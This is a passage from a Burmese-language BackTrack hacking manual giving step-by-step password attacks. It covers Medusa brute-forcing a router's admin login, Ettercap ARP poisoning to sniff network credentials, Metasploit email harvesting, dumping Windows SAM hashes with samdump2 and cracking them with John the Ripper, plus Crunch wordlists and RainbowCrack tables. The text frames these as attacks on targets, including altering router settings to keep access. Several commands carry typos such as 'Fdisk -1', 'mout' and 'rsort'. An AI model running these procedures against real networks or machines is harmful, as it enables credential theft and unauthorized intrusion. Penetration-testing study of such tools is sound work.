၂။ ထို႕ေနာက္ ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း ေရြးခ်ယ္ထားေသာ Option ျဖင့္ပင္ Medusa ကို


ေမာင္းႏွင္ေပးရပါမည္။

medusa –M http –h 192.168.10.1 –u admin –P /pentest/passwords/wordlists/darkc0de.lst


–e ns –n 80 –F

အထက္ပါ Command တြင္အသံုးျပဳေသာ Option မ်ားကိုရွင္းျပရလွ်င္ ေအာက္ပါအတိုင္းေတြ႕ႏိုင္ပါမည္။

-M http: ၄င္း Option သည္ အသံုးျပဳမည္႕ Module ကိုသတ္မွတ္ေပးရျခင္းျဖစ္သည္။ ယခုေနရာတြင္ http


module ကိုအသံုးျပဳထားသည္ကိုေတြ႕ရမည္ျဖစ္သည္။

-h 192.168.10.1: ထုိ Option သည္ Host ကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။ ယခုေနရာတြင္


(Router ၏ IP Address ျဖစ္ေသာ) 192.168.10.1 ကိုအသံုးျပဳထားပါသည္။

264 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

-u admin: ယင္း Option သည္ user ကိုသတ္မွတ္ေပးျခင္းပင္ျဖစ္သည္။ ယခုေနရာတြင္ admin ကိုအသံုး


ျပဳထားပါသည္။

-p [location of password list]: ၄င္း Option သည္ Password list file ရိွသည္႕ေနရာကို သတ္မွတ္ေပး
ရန္အသံုးျပဳပါသည္။

-e ns: ၄င္း Otpion သည္ additional Password check ကိုသတ္မွတ္ေပးရန္အသံုးျပဳပါသည္။ ns variable


သည္ username ႏွင့္ Password တူညီေသာအခါတြင္လည္းေကာင္း၊ မည္သည္႕စာလံုးမွ မပါေသာ Empty
Password မ်ားအျဖစ္ေသာ္လည္းေကာင္း ျဖစ္လာသည္႕အခါတြင္ လြယ္ကူစြာ သိရိွႏိုင္ေစရန္အတြက္
အသံုးျပဳႏိုင္ပါလိမ့္မည္။

-n 80: ထို Option သည္ Port no ကိုသတ္မွတ္ရာတြင္အသံုးျပဳႏိုင္ပါသည္။ ယခုေနရာတြင္ 80 ကို


အသံုးျပဳထားသည္ကိုေတြ႕ရပါသည္။

-F : ယင္း Option သည္ username/ password combination ကိုရရိွၿပီးခ်ိန္တြင္ လုပ္ေဆာင္ခ်က္ကို ရပ္


တန္႕ရန္အတြက္အသံုးျပဳပါသည္။

၃။ ထုိ႕ေနာက္တြင္ေအာက္ပါပံုအတိုင္းပင္ Medusa သည္ မေအာင္ျမင္မခ်င္း Wordlist မွ အားလံုးေသာ


username မ်ား၊ Password combination မ်ားႏွင့္ တိုက္ဆိုင္စစ္ေဆးေတာ့မည္ျဖစ္ပါသည္။

လုပ္ေဆာင္ပံုကိုေလ့လာရလွ်င္ Target Router ၏ Password ကိုသိႏိုင္ရန္အတြက္ Medusa ကဲ့သို႕ေသာ


Brute-force attack Software ကိုအသံုးျပဳခဲ့သည္ကိုေတြ႕ရမည္ျဖစ္သည္။ အားသာခ်က္အရ ေအာင္ျမင္
ခဲ့ခ်ိန္တြင္ Router သို႕၀င္ေရာက္ျခင္းအျပင္ Settings မ်ားကို ေျပာင္းလဲ၍ ေနာင္တြင္အခ်ိန္မေရြး
၀င္ေရာက္ႏိုင္ရန္အတြက္ ျပင္ဆင္ျခင္းတို႕အျပင္ Rounter သို႕ေပးပို႕ထားေသာ Traffic မ်ားကိုပင္
ႏွစ္သက္ရာ Location သို႕ Reroute ျပဳလုပ္ႏိုင္ပါလိမ့္မည္။

Medusa command ကိုအသံုးျပဳ၍ Command line မွတိုက္ရိုက္ Medusa ကုိေမာင္းႏွင္ႏိုင္သည္ကို


သိရိွခဲ့ၿပီးျဖစ္သည္။ ယခုတဖန္အေျခအေနကိုမူတည္၍ အသံုးျပဳႏိုင္ေသာ အျခား Option မ်ားကို လည္း
မ်က္ပြင့္စာေပ 265
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

အသံုးျပဳေစႏိုင္ပါလိမ့္မည္။ အေသးစိပ္သိရိွႏိုင္ရန္အတြက္ Terminal Window တြင္ medusa ဟုရိုက္


ထည္႕ျခင္းျဖင့္ ေပၚလာေသာ Help ဖိုင္တြင္ၾကည္႕ရွဳႏိုင္ပါသည္။

Medusa ကိုအသံုးျပဳ၍ Attack ျပဳလုပ္ႏိုင္ေသာ Module မ်ားကိုေအာက္တြင္ေဖာ္ျပထားရိွပါသည္။ ၄င္း


တို႕မွာ

 AFP
 CVS
 FTP
 HTTP
 IMAP
 MS SQL
 MySQL
 NetWare
 NNTP
 pcAnywhere
 POP3
 PostgreSQL
 REXEC
 RLOGIN
 RSH
 SMBNT
 SMTP AUTH
 SMTP VRFY
 SNMP
 SSHv2
 Subversion

266 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Telnet
 VMware authentication
 VNC
 Generic wrapper
 Web form တို႕ျဖစ္ပါသည္။

Password profiling
ယခုအပိုင္းတြင္ Password attack ကိုမစတင္မီတြင္ password မ်ားကို profile ျပဳလုပ္ျခင္းကို ေလ့လာ
ၾကည္႕ၾကမည္ျဖစ္သည္။ Password မ်ားကို profile ျပဳလုပ္ရျခင္း၏ ရည္ရြယ္ခ်က္မွာ တိုက္ခိုက္မည္႕
Machine, Business တို႕မွ အခ်က္အလက္မ်ားကိုစုေဆာင္းထားျခင္းျဖင့္ Password ကိုခန္႕မွန္း လာႏိုင္
မည္ျဖစ္ၿပီး ပိုမိုေသးငယ္ေသာ wordlist ျဖင့္အစားထုိးအသံုးျပဳေစႏိုင္မည္ ျဖစ္ေသာေၾကာင့္ အခ်ိန္ၾကာျမင့္မႈ
ကိုေလွ်ာ့ခ်ေပးေစႏိုင္မည္ျဖစ္ပါသည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ettercap ႏွင့္ Traffic မ်ားကို Sniff ျပဳလုပ္
ရန္အတြက္ ARP Poisoning function ကိုအသံုးျပဳရပါလိမ့္မည္။ ထို႕ေၾကာင့္ လုပ္ေဆာင္ခ်က္မ်ားကို
ေလ့လာၾကည္႕ၾကပါမည္။

၁။ Ettercap ကို Configuration ျပဳလုပ္ရပါမည္။ ထို႕ေနာက္ ေရွးဦးစြာ Configuration file ကို locate
ျပဳလုပ္ကာ Vim ကိုအသံုးျပဳ၍ ျပင္ဆင္ေပးရပါလိမ့္မည္။ ထို႕ေၾကာင့္ ေအာက္ပါ Command ကိုအသံုးျပဳရ
ပါလိမ့္မည္။

locate etter.conf

vi/etc/etterconf

မွတ္ရန္။ ။Location သည္အသံုးျပဳသူေပၚတြင္လိုက္၍ ကြျဲ ပားႏိုင္ပါသည္။

၂။ ec_uid ႏွင့္ ec_gid တန္ဖိုးမ်ားကို 0 ဟုေျပာင္းလဲရပါမည္။ ေအာက္တြင္ပံုႏွင့္ေဖာ္ျပထားပါသည္။

မ်က္ပြင့္စာေပ 267
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္ ေအာက္ပါပံုတြင္ေဖာ္ျပထားသည္႕အတိုင္း ဖိုင္၏ေအာက္နားတြင္ရိွေသာ Linux Section


ေအာက္မွ iptables တြင္ရိွေသာ Comment Sign ကို ဖ်က္ေပးရပါမည္။

၄။ ထိ႕ု ေနာက္ Ettercap ကိုစတင္ရမည္ျဖစ္သည္။ GUI Mode တြင္စတင္ရန္ျဖစ္သည္႕အတြက္ -G option


ကိုအသံုးျပဳရပါလိမ့္မည္။

ettercap –G

၅။ Unified Sniffing ကို စတင္ဖြင့္ရပါမည္။ ထုိသို႕ဖြင့္ရန္အတြက္ Shift + U ဟုတြႏ


ဲ ိွပ္၍ေသာ္လည္း
ေကာင္း၊ Sniff Menu မွ Unified Snifing ကိုေရြးခ်ယ္၍ေသာ္လည္းေကာင္း ျပဳလုပ္ႏိုင္ပါသည္။

268 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Network Interface ကိုေရြးခ်ယ္ေပးရပါမည္။

၇။ ထိ႕ု ေနာက္ Scan for hosts ကို ဖြင့္ေပးရပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ctrl + S ကိုတြႏ
ဲ ိွပ္၍ ျဖစ္ေစ
Hosts Menu မွ Scan for hosts ကိုေရြးခ်ယ္၍ျဖစ္ေစ အသံုးျပဳႏိုင္ပါသည္။

၈။ Sniffing ကိုစတင္ရန္အတြက္ Ettercap ကိုျပဳလုပ္ေဆာင္ရြက္ေပးရပါမည္။ ထုိသို႕ျပဳလုပ္ရန္အတြက္


Ctrl + W ကိုတႏ
ြဲ ိွပ္၍ ျဖစ္ေစ၊ Start Menu မွ Start Sniffing ကိုေရြးခ်ယ္ေပးျခင္းျဖင့္ျဖစ္ေစ ျပဳလုပ္ႏိုင္ပါ
သည္။

မ်က္ပြင့္စာေပ 269
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၉။ ေနာက္ဆံုးတြင္ ARP Poisoning process ကိုစတင္ရန္လိုအပ္လာပါသည္။ ထို႕ေၾကာင့္ Mitm Menu မွ


ARP Poisoning ကိုဆက္လက္ေရြးခ်ယ္ေပးရပါမည္။

၁၀။ ေအာက္တြင္ျပထားသည္႕ပံုအတိုင္းေပၚလာခဲ့လွ်င္ Sniff remote connections ဟူေသာ Option ကို


အမွန္ျခစ္ေပးေရြးခ်ယ္၍ OK တြင္ Click ႏိွပ္ေပးရပါမည္။

၁၁။ Network Traffic ေပၚတြင္မူတည္၍ Ettercap Window ေပၚတြင္ရိွေသာ Information မ်ားကိုေတြ႕


ျမင္ၾကရမည္ျဖစ္ပါသည္။

270 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၂။ ထို႕ေနာက္ ရွာေဖြေနေသာ Usernames ႏွင့္ Passwords တိ႕ု ကုိေတြ႕ရိွၿပီးေသာအခါတြင္ Ettercap ကို
ျပန္ပိတ္ရန္လိုအပ္ပါသည္။ ထိုသို႕ျပန္ပိတ္ရန္အတြက္ Ctrl +E ကိုတြႏ
ဲ ိွပ္၍ ျဖစ္ေစ၊ Start Menu မွ Stop
sniffing ကိုေရြးခ်ယ္၍ျဖစ္ေစ ရပ္တန္႕ေပးႏိုင္ပါသည္။

၁၃။ ARP Poisioning ကိုလည္း ျပန္ပိတ္ေပးၿပီး network ကိုမူလအတိုင္း ျပန္ထားရပါမည္။ ထိုသို႕ျပဳလုပ္


ရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ ပံုအတိုင္းလုပ္ေဆာင္ရပါမည္။

မ်က္ပြင့္စာေပ 271
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ထို႕ေနာက္လုပ္ေဆာင္ခ်က္မ်ားကိုျပန္လည္ေလ့လာၾကည္႕မည္ဆိုလွ်င္ Network မွ Username မ်ားႏွင့္


Password မ်ားကို ခိုးယူရန္အတြက္ Ettercap ကိုအသံုးျပဳ၍ Network ကို Poision ျပဳလုပ္ျခင္းပင္ျဖစ္ပါ
သည္။ Ettercap Configuration file ကို Locate ျပဳလုပ္ျခင္း၊ Alter ျပဳလုပ္ျခင္းတို႕ႏွင့္ ယခုအပိုင္းကို
စတင္ခဲ့ၿပီး Ettercap ကို ဖြင့္ကာ ARP poisioning ကိုအသံုးျပဳ၍ man-in-the-middle (MITM) attack ကို
ျပဳလုပ္ေဆာင္ရြက္ပါသည္။ Traffic ကို မိမိ Machine သို႔လမ္းလႊဲေစၿပီးေနာက္ Network ေပၚမွ Users
မ်ား၏ ထုတ္လႊင့္မႈကိုမူတည္၍ Username မ်ား၊ Password မ်ားကိုျမင္ေတြ႕ရေစႏိုင္ပါသည္။

ထို႕အျပင္ Metasploit ကိုအသံုးျပဳ၍လည္း Username မ်ားကို Profile ျပဳလုပ္ႏိုင္ပါသည္။ ထို႕သို႕ျပဳလုပ္


ရန္အတြက္ Email Collector Module ကိုရွာေဖြေပးရပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ MSFCONSOLE ကိုစတင္ရန္အတြက္ ေအာက္ပါ Command ကိုရိုက္ထည္႕


ေပးရပါမည္။

msfconsole

၂။ Email Collector Module ကို ရွာေဖြရန္အတြက္ ေအာက္ပါ Command ကုိရိုက္ထည္႕ေပးရပါမည္။

search email collector

၃။ Search Email Collector module ကိုအသံုးျပဳရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

use auxiliary/gather/search_email_collector

၄။ Module အတြက္အသံုးျပဳေစႏိုင္မည္႕ Option မ်ားကိုေဖာ္ျပရန္အတြက္ ေအာက္ပါ Command ကို


အသံုးျပဳရပါမည္။

272 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

show options

၅။ ထိ႕ု ေနာက္ Domain Name ကိုသတ္မွတ္ေပးရပါမည္။ ထိုသို႕သတ္မွတ္သည္႕အခါ လူေပါင္းစံု၀င္ေရာက္


ျခင္းကိုကာကြယ္ရန္အတြက္ သတိထားေပးရပါမည္။

၆။ ထို႕ေနာက္ ေအာက္ပါ Command ကိုအသံုးျပဳ၍ ႏွစ္သက္ရာ Domain name တစ္ခုကို အသံုးျပဳေစႏိုင္


ပါမည္။

set domain fromwilliesperspective.com

၇။ ထို႕ေနာက္ Output file ကိုသတ္မွတ္ေပးရပါမည္။ ယခုအဆင့္ကို မျပဳလုပ္လွ်င္လည္းရပါသည္။


အၾကံေပးလိုသည္မွာ မ်ားစြာေသာ attack မ်ားကုိ ျပဳလုပ္မည္႕အခါတြင္လည္းေကာင္း၊ Attack တစ္ခုကို
ေနာင္တစ္ခ်ိန္တြင္ျပန္လည္အသံုးျပဳမည္ဟု ၾကံရြယ္လွ်င္ေသာ္လည္းေကာင္း ယင္း Option ကိုအသံုးျပဳ
သင့္ပါသည္။

set outfile /root/Desktop/fromwillie.txt

၈။ ေနာက္ဆံုးတြင္ Exploit ကိုေမာင္းႏွင္ေပးရပါမည္။

run

မ်က္ပြင့္စာေပ 273
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Cracking a Windows password using John


the Ripper
ယခုအပိုင္းတြင္ John the Ripper ကိုအသံုးျပဳၿပီး Windows Security Accounts Manager (SAM) file
တစ္ခုကို Crack ျပဳလုပ္ျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္ပါသည္။ SAM file တြင္ တိုက္ခိုက္မည္႕ Windows
စနစ္တြင္အသံုးျပဳေသာ User မ်ား၏ Username ႏွင့္ Password Hash မ်ားကိုသိမ္းဆည္းထားေလ့ရိွပါ
သည္။ လံုၿခံဳေရးအရ SAM ဖိုင္ကို အခြင့္မရိွပဲ၀င္ေရာက္ျခင္းမ်ားမွ ကာကြယ္ထားတတ္ေသာေၾကာင့္
Window စနစ္လည္ပတ္ေနစဥ္အတြင္းတြင္ ဖြင့္ၾကည္႕ျခင္းမ်ား၊ Copy ကူးယူျခင္းမ်ားကို လုပ္ေဆာင္ႏိုင္စြမ္း
မရိွတတ္ၾကပါ။ ယခုအပိုင္းတြင္ SAM ကို၀င္ေရာက္ျခင္းႏွင့္ Windows စနစ္ကို ထိုးေဖာက္၀င္ေရာက္
ျခင္းမ်ားကို ျပဳလုပ္ လုပ္ေဆာင္ၾကည္႕မည္ျဖစ္ေသာေၾကာင့္ ေအာက္တြင္ေဖာ္ျပထားေသာ အဆင့္အလိုက္
လုပ္ေဆာင္ျခင္းျဖင့္ စတင္ေလ့လာၾကည္႕ၾကပါမည္။

မစတင္မီတြင္ Remote exploit hack ျဖင့္ျဖစ္ေစ၊ တိုက္ခိုက္မည္႕ကြန္ပ်ဴတာတြင္ USB သိ႕ု မဟုတ္ DVD
ROM Drive ျဖင့္ BackTrack ကိုေမာင္းႏွင္ထားျခင္းျဖင့္ျဖစ္ေစ အဆင္သင့္ျဖစ္ေနၿပီဟု ယူဆပါသည္။

၁။ Mount ျပဳလုပ္လိုသည္႕ Hard Disk ကိုေအာက္ပါ Command ျဖင့္စစ္ေဆးၾကည္႕ရပါမည္။

Fdisk -1

၂။ Hard Disk ကို Mount ျပဳလုပ္ၿပီး Target အျဖစ္ေရြးခ်ယ္သတ္မွတ္ထားရပါမည္။

mout /dev/sda1 /target/

၃။ Window SAM file ရိွသည္႕ Location ကို ၀င္ေရာက္ရပါမည္။ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္
ပါသည္။

cd /target/windows/system32/config

၄။ ထိုလမ္းေၾကာင္းတြင္ရိွသည္႕ဖိုင္မ်ားကို ေအာက္ပါ Command ျဖင့္ၾကည္႕ရွဳႏိုင္ပါသည္။

ls –al

274 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ SamDump2 ကိုအသံုးျပဳ၍ SAM ဖိုင္မွ Hash မ်ားကို Extract ျပဳလုပ္ကာ Root user directory ထဲရိွ
Hashes ဟူေသာ Folder တြင္ Hash.txt ဖိုင္အျဖစ္ Output လုပ္ယူပါမည္။ ေအာက္ပါ Command
ကိုအသံုးျပဳရမည္ျဖစ္ပါသည္။

samdump2 system SAM > /root/hashes/hash.txt

၆။ John the ripper ရိွေသာ Directory လမ္းေၾကာင္းသို႕ေအာက္ပါ Command ကိုအသံုးျပဳ၍ ေျပာင္းလဲ


ရပါမည္။

cd /pentest/passwords/jtr

၇။ John the ripper ကိုေမာင္းႏွင္ေပးရပါမည္။

./john /root/hashes/hash.txt

NTFS Filesystem တြင္ရိွေသာဖိုင္ကိုသာ ထိုးေဖာက္ျခင္းျဖစ္ပါက ေအာက္ပါ Command ကိုသာ အသံုးျပဳ


ရပါမည္။

./john /root/hashes/ hash.txt-f:nt

လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ Windows SAM file ကို Crack လုပ္ရန္အတြက္ John the


Ripper ကိုအသံုးျပဳခဲ့ပါသည္။ Windows Machine ကိုအသံုးျပဳေသာကြန္ပ်ဴတာမ်ားကို Physical Access
ျဖင့္ျဖစ္ေစ၊ Remote Access ျဖင့္ျဖစ္ေစ၊ ၀င္ေရာက္ထားျခင္းျဖစ္ရပါမည္။ ထိ႕ု ေနာက္ SAM file မွ Hash
မ်ားကို SamDump2 ကိုအသံုးျပဳ၍ Extract လုပ္ယူျခင္းျဖစ္သည္။ ထို႕ေနာက္တြင္ John the Ripper
ကိုအသံုးျပဳ၍ Brute-force ျဖင့္ Attack ျပဳလုပ္ၿပီး Password ကိုတုိက္ဆိုင္ရယူျခင္းျဖစ္သည္။

Using dictionary attacks


ယခုအပိုင္းတြင္ Wordlist attack သို႕မဟုတ္ Dictionary attack ျပဳလုပ္ပံုကိုေဖာ္ျပေပးမည္ျဖစ္သည္။
Dictionary Attack တြင္ ႀကိဳတင္ခန္႕မွန္းထားေသာ Password အစုအေ၀းမ်ားကိုအသံုးျပဳျခင္းျဖစ္ၿပီး
Brute-Force attack ျဖင့္ပင္တိုက္ဆိုင္စစ္ေဆးျခင္းျဖစ္သည္။ ထိုသို႕ျပဳလုပ္ရန္ ေကာင္းမြန္ေသာ Wordlist
ဖိုင္ကိုအသံုးျပဳရမည္ျဖစ္သည္။ အဓိကက်ေသာ Dictionary List သံုးမ်ိဳးရိွပါသည္။ ၄င္းတို႕မွာ

မ်က္ပြင့္စာေပ 275
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Username Only: ေဖာ္ျပပါ Lists ထဲတြင္ Username မ်ားအတြက္အသံုးျပဳရေသာ


စကားလံုးမ်ားကိုသာ ထည္႕သြင္းေပးထားပါသည္။
 Password Only: ေဖာ္ျပပါ List ထဲတြင္ Password မ်ားအတြက္ အသံုးျပဳေသာ
စကားလံုးမ်ားကိုသာ ထည္႕သြင္းေပးထားျခင္းျဖစ္သည္။
 Username and password lists: ေဖာ္ျပပါ List ထဲတြင္ Username မ်ားအတြက္သာ မက
Password မ်ားအတြက္ကိုပါ ပူးတြထ
ဲ ည္႕သြင္းထားေသာ စကားလံုးမ်ားပါ၀င္ပါ သည္။

စတင္ရန္အတြက္ လုပ္ေဆာင္ရမည္႕ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ေဖာ္ျပေပးမည္ျဖစ္သည္။

၁။ Terminal Window ကိုဖြင့္ၿပီး Package list ကို update ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command
ကိုအသံုးျပဳရပါမည္။

apt-get update

၂။ Crunch ကို Install ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command ျဖင့္လုပ္ေဆာင္ႏိုင္မည္ျဖစ္သည္။

apt-get install crunch

၃။ Terminal Window ကိုဖြင့္၍ Crunch ၏ Location ကိုေအာက္ပါအတိုင္း သတ္မွတ္ေပးရပါမည္။

/pentest/passwords/crunch

၄။ Crunch ကိုအသံုးျပဳ၍ Password ကို Generate ျပဳလုပ္ရန္အတြက္ အသံုးျပဳရမည္႕ Command ပံုစံမွာ


crunch [minimum length] [maximum length] [character set] [option] ပင္ျဖစ္ပါသည္။

276 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ Crunch တြင္ Option ေပါင္းမ်ားစြာကိုအသံုးျပဳႏိုင္ပါသည္။ ထို႕ေၾကာင့္ အသံုးမ်ားေသာ Option မ်ားကို


ေအာက္တြင္ေဖာ္ျပထားပါသည္။

 -o : ထို Option သည္ output wordlist ၏ Location ႏွင့္ filename ကိုသတ္မွတ္ေပး


ရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။
 -b : ၄င္း Option သည္ File တစ္ဖိုင္စီတြင္ အမ်ားဆံုးအသံုးျပဳႏိုင္ေသာ Byte ကိုသတ္
မွတ္ရန္အတြက္ အသံုးျပဳ႔ပါသည္။ အသံုးျပဳႏိုင္ေသာ Size မ်ားကို KB/MB/GB တို႕ႏွင့္
သတ္မွတ္ေပးၿပီး -o START trigger ႏွင့္ ပူးတြအ
ဲ သံုးျပဳရပါမည္။
 -t : ထို Option သည္ အသံုးျပဳမည္႕ Pattern ကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါ
သည္။
 -l: အဆိုပါ Option သည္ -t option ကိုအသံုးျပဳသာအခါတြင္ အထူးျပဳအကၡရာမ်ားကို
အသံုးျပဳခြင့္ေပးရန္အတြက္ ျဖစ္ပါသည္။

၆။ ထိ႕ု ေနာက္ အနည္းဆံုး ၈ လံုးမွ အမ်ားဆံုး ၁၀ လံုးရိွေသာ Character မ်ားႏွင့္ Character Set အျဖစ္
ABCDEFGabcdefg0123456789: အစရိွသျဖင့္ Password List တစ္ခုကိုတည္ေဆာက္ရန္အတြက္
Command ကို အသံုးျပဳေပးရပါမည္။

/pentest/passwords/crunch/crunch 8 10 ABCDEFGabcdefg0123456789 –o /root/Desktop/


generatedCrunch.txt

၇။ ထိုသို႕ file ကို ထုတ္ၿပီးေသာအခါတြင္ Nano ကိုအသံုးျပဳ၍ ေအာက္ပါအတိုင္းဖိုင္ကို ဖြင့္ႏိုင္ၿပီျဖစ္သည္။

nano /root/Desktop/generatedCrunch.txt

အလုပ္လုပ္ေဆာင္ျခင္းကိုေလ့လာမည္ဆိုပါက Password Dictonary List ကိုထုတ္ေပးရန္အတြက္


Crunch ကိုအသံုးျပဳပါသည္။ မ်ားစြာေသာ Brute-force attack တို႕ႏွင့္ အသံုးျပဳသူ၏ ျဖစ္ႏိုင္ဖြယ္ရာ

မ်က္ပြင့္စာေပ 277
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Password မ်ားကိုလိုက္လံႏိႈင္းယွဥ္ၿပီးေနာက္ Password Dictionary List တစ္ခုကိုရရိွေစႏိုင္မည္ျဖစ္


သည္။



278 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Using rainbow tables


ယခုအပိုင္းတြင္ BackTrack 5 တြင္ပါ၀င္ေသာ Rainbow Table မ်ားကိုအသံုးျပဳၾကည္႕ၾကပါမည္။ Rainbow
Table ဆိုသည္မွာ အထူးျပဳလုပ္ထားေသာ Dictionary Table ျဖစ္ၿပီး ၄င္းတြင္ သာမန္ Dictionary
စကားလံုးမ်ားအစား Hash Value မ်ားကိုသာ Attack လုပ္ယူရန္ထည္႕သြင္းေပးထားပါသည္။ ထို႕ေၾကာင့္
Rainbow Tables မ်ားကို ထုတ္လုပ္ေပးႏိုင္ရန္အတြက္ RainbowCrack ကိုအသံုးျပဳရပါမည္။

၁။ Terminal Window ကိုဖြင့္ၿပီးေနာက္ rtgen ဟူေသာ Directory လမ္းေၾကာင္းကိုေျပာင္းလဲေပးရပါ


သည္။

cd /pentest/passwords/rainbowcrack/

၂။ ထိ႕ု ေနာက္ MD5-အေျချပဳ Rainbow Table ကို ထုတ္ေပးႏိုင္ရန္အတြက္ rten ကိုေအာက္ပါ Command
ကိုအသံုးျပဳ၍ ေမာင္းႏွင္ေပးရပါမည္။

./rtgen md5 loweralpha-numeric 1 5 0 3800 33554432 0

မ်က္ပြင့္စာေပ 279
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ table လုပ္ေဆာင္ျခင္းကိုေဆာင္ရြက္ေနမည္ျဖစ္သည္။ လုပ္ေဆာင္ခ်က္သည္ CPU အေရအတြက္ေပၚ


လိုက္၍ အခ်ိန္အနည္းအမ်ားကြာျခားခ်က္ရိွႏိုင္ပါသည္။ ခန္႕မွန္းေျခအားျဖင့္ 2 နာရီမွ 7 နာရီခန္႕အထိ
ကြာျခားမႈရိွပါသည္။ ထိ႕ု အျပင္ ထုတ္လုပ္လိုက္ေသာ Table ကို Output Directory ထဲမွ *.rt extension
ျဖင့္ေတြ႕ရိွႏိုင္မည္ျဖစ္ပါသည္။

၄။ Password Cracking လုပ္ေဆာင္ခ်က္ကိုစတင္ႏိုင္ေစရန္အတြက္ rtsort program ကို အသံုးျပဳၿပီး


Rainbow Tables ကို Sort ျပဳလုပ္ႏိုင္ပါသည္။ ၄င္းသည္ လြယ္ကူေသာ လုပ္ေဆာင္ခ်က္တစ္ခုလည္း
ျဖစ္ပါသည္။ ထိုသို႕ rsort command ၏အသံုးျပဳပံုကိုေအာက္တြင္ေဖာ္ျပေပးထားပါသည္။

rsort md5_loweralpha-numeric #1-5_[Sequence number of the file]_3800x33554432_0.rt

၅။ ေနာက္ဆံုးတြင္ Hash ကိုႏိႈင္းယွဥ္ရန္အတြက္ rcrack ကိုအသံုးျပဳရပါမည္။ RainbowCrack သည္ Hash


ႏွစ္မ်ိဳးကို Attack ျပဳလုပ္ႏိုင္ၿပီး ၄င္းတိ႕ု မွာ Single ႏွင့္ Multiple တို႕ျဖစ္ပါသည္။ ေရးသားရမည္႕ ပံုစံ မွာ
ေအာက္ပါအတိုင္းျဖစ္ပါသည္။

 Single : rcrack [path to RT directory]\*.rt –h [The hash value we are trying to


crack]
 Multiple: rcrack [path to RT directory]\*.rt –l [Path to hash file]

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ ယခုအပိုင္းတြင္ MD5 Password မ်ားကို ထုတ္ယူရန္၊


စီရန္ႏွင့္ Crack ရန္တို႕အတြက္ RainbowCrack Tool အမ်ားအျပားကိုအသံုးျပဳခဲ့ပါသည္။ RainbowCrack
သည္ Rainbow Table မ်ားတြင္အသံုးျပဳထားေသာ Hash Value မ်ားကို Brute-force ကိုအသံုးျပဳ၍ Hash
အခ်င္းခ်င္းႏိႈင္းယွဥ္မႈျပဳလုပ္ရာတြင္ လုပ္ေဆာင္ေစႏိုင္ပါသည္။ ယခုအပိုင္းတြင္ MD5 Rainbow ကို
ထုတ္လုပ္ျခင္းႏွင့္ စတင္ေပးခဲ့ၿပီး Lowercase alphanumeric value မ်ားကိုသာ အသံုးျပဳပါသည္။
ယခုအပိုင္း၏အဆံုးတြင္ Hash File တစ္ခုကို Utilize ျပဳလုပ္ရန္အတြက္ Rainbow Table ကိုဖန္တီးမႈကို
ေဖာ္ျပထားပါသည္။

280 မ်က္ပြင့္စာေပ
